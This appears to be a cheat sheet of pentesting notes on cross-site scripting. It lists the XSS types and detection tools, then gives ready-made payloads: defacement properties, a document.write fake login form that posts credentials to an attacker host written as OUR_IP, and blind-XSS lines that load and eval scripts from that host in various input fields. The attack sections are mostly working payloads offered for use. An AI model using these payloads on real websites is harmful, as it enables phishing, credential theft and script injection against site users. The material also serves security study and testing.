discovery

Type of XSS vulnerabilities I. Reflected XSS II. Stored XSS III. DOM XSS

XSS detection tools https://github.com/s0md3v/XSStrike https://github.com/rajeshmajumdar/BruteXSS https://github.com/epsylon/xsser

XSS attacks

Web defacing attack

Defacement elements to use

document.body.style.background = 'black'
document.body.background
document.title
DOM.innerHTML

Phishing

# Create a fake login page and trigger victim to login In.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

Credentials stealing

Send crafted phishing link to user
Set up python http.server to receive credentials

Blind XSS detection:

Potential vulnerable parameters

• Contact forms

• Reviews

• User details

• Support tickets

• HTTP user-agent header

There are two issue in order to find blind XSS

1. How can we know which specific field is vulnerable?
2. How can we know what XSS payload to use?

Detection setup

## Set up a python3 or any other server to receive requests
			
# ------ Use payload like that: ------
<script src=http://OUR_IP></script>

'><script src=http://OUR_IP></script>

"><script src=http://OUR_IP></script>

javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>

<script>$.getScript("http://OUR_IP")</script>

Testing payloads

#  Test payload in different field with names according to field name.
NOTE: we can skip password field as it is hashed and email field requires email format

<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field